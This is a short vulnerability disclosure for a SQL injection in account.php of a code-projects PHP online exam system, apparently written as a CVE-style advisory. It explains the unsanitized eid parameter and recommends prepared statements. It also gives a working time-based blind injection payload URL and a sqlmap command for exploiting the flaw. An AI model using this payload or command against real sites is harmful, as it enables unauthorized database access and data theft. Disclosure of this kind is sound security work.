# code-projects online-exam-mastering-system-php has sql injection in account.php ## supplier https://code-projects.org/online-exam-mastering-system-php/ ## describe In account.php, ### Code analysis  The SQL Injection vulnerability here exists because the value of `$_GET['eid']` is directly embedded into the SQL queries without any validation or sanitization. If an attacker inputs malicious SQL code as the `eid` parameter, it will be executed by the database. For example, if `eid` is set to `'1' OR '1'='1'`, it could manipulate the query to return or modify unintended data. Always use **prepared statements** or **parameterized queries** to prevent this. ## payload ``` http://host/account.php?q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 9913 FROM (SELECT(SLEEP(5)))emka) AND 'nnHe'='nnHe&n=1&t=5 ``` ## exploit use sqlmap to attack ``` sqlmap -u "/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5" -p eid --batch" ```